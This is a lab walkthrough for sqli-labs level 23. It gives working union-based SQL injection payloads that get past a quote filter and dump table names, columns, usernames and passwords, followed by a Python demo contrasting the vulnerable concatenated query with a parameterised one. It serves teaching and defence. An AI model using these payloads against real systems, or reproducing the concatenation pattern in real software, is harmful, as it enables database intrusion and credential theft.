Level 23 filters injection characters with a regular expression, so the work has to be done around the quotes:
http://sqlilabs/Less-23/?id=1' and '1
Once the principle is understood, constructing the payloads is straightforward:
- List tables
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1
Simplified:
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),'3
- List columns
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3
- Dump data
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3
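The reason a blacklist filter does not stop this level is that the user-supplied id is still concatenated into the SQL string; the filter only removes one way of ending the statement. The following is an added example, not code from the page or from sqli-labs: it reproduces the weak pattern against an in-memory SQLite table (MySQL in the lab) with the page's own "dump usernames" payload, and sets a parameterised lookup beside it. The filter being a comment-marker stripper and the query shape `SELECT * FROM users WHERE id='$id' LIMIT 0,1` are assumptions made here; the user rows are constructed sample data.

```python
import re
import sqlite3

# Constructed sample data standing in for the lab's "users" table (not the lab's real rows).
SAMPLE_USERS = [
    (1, "alice", "pw-alice"),
    (2, "bob", "pw-bob"),
    (3, "carol", "pw-carol"),
]

# The page's own "dump usernames" payload, exactly as it appears in the id parameter.
PAYLOAD = "-1' union select 1,(select group_concat(username) from users),'3"


def _connect():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def strip_comments(user_id):
    """Blacklist filter assumed to resemble the level's regex: removes SQL comment markers.

    Note that the page's payload contains neither '--' nor '#', so it passes through unchanged.
    """
    return re.sub(r"--|#", "", user_id)


def vulnerable_lookup(user_id):
    """Filtered but still string-concatenated: the weak pattern the level demonstrates.

    Returns the first row the database produces, which for the payload is the
    UNION row carrying every username rather than a row selected by id.
    """
    conn = _connect()
    filtered = strip_comments(user_id)
    sql = f"SELECT id, username, password FROM users WHERE id='{filtered}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def safe_lookup(user_id):
    """Parameterised query: the id is bound as data and cannot alter the statement.

    The same payload now simply fails to match any id and returns None; a real
    handler would additionally reject non-numeric ids before touching the database.
    """
    conn = _connect()
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    print("concatenated + filter:", vulnerable_lookup(PAYLOAD))
    print("parameterised:        ", safe_lookup(PAYLOAD))
    print("parameterised, legit: ", safe_lookup("2"))
```

Running it shows the concatenated version returning a row whose second column is the joined list of all usernames, while the parameterised version returns nothing for the payload and the correct single row for a legitimate id. Detection-wise, the tell in the filtered version is that the filter has no effect on the payload at all, which is why logging the raw parameter rather than the post-filter value is what surfaces such requests.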
😄